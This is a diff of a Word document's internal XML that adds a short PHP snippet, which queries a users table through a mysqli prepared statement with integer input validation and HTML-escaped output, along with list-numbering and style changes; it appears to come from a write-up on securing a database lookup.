+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>include('../../../config/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>config.inc.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>mysqli</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>mysqli</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>$DB_HOST, $DB_USER, $DB_PASS, $DB_NAME);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">$id = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>filter_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>input</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>INPUT_GET, 'id', FILTER_VALIDATE_INT);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>if ($id === false || $id === null) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    echo "Invalid input.";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    exit;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>stmt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>mysqli</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>prepare(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>first_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>last_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM users WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>user_id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>= ?</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>stmt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>bind_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>param</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>", $id);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>stmt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>execute(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>$result = $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>stmt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>get_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>result</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>while ($row = $result-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>fetch_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>assoc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>)) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    echo </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>htmlspecialchars</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>($row['</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>first_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>'], ENT_QUOTES, 'UTF-8'</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>) .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> " " .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">         </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>htmlspecialchars</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>($row['</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>last_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>'], ENT_QUOTES, 'UTF-8'</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>) .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>br</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>&gt;";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>stmt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>close(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>mysqli</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>close(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>?&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -2312,6 +7764,123 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="53C72EBA"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="8CB0B62A"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="555559EF"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="EA32129E"/>
@@ -2460,7 +8029,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6AD654AD"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="86E684D0"/>
@@ -2673,7 +8242,7 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="22" w16cid:durableId="1560019394">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="23" w16cid:durableId="1186792301">
     <w:abstractNumId w:val="2"/>
@@ -2688,6 +8257,9 @@
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="27" w16cid:durableId="1371567468">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="28" w16cid:durableId="199901701">
     <w:abstractNumId w:val="6"/>
   </w:num>
 </w:numbering>
@@ -3091,7 +8663,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="00F64D51"/>
+    <w:rsid w:val="003F03CC"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading1">
     <w:name w:val="heading 1"/>
@@ -3302,7 +8874,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
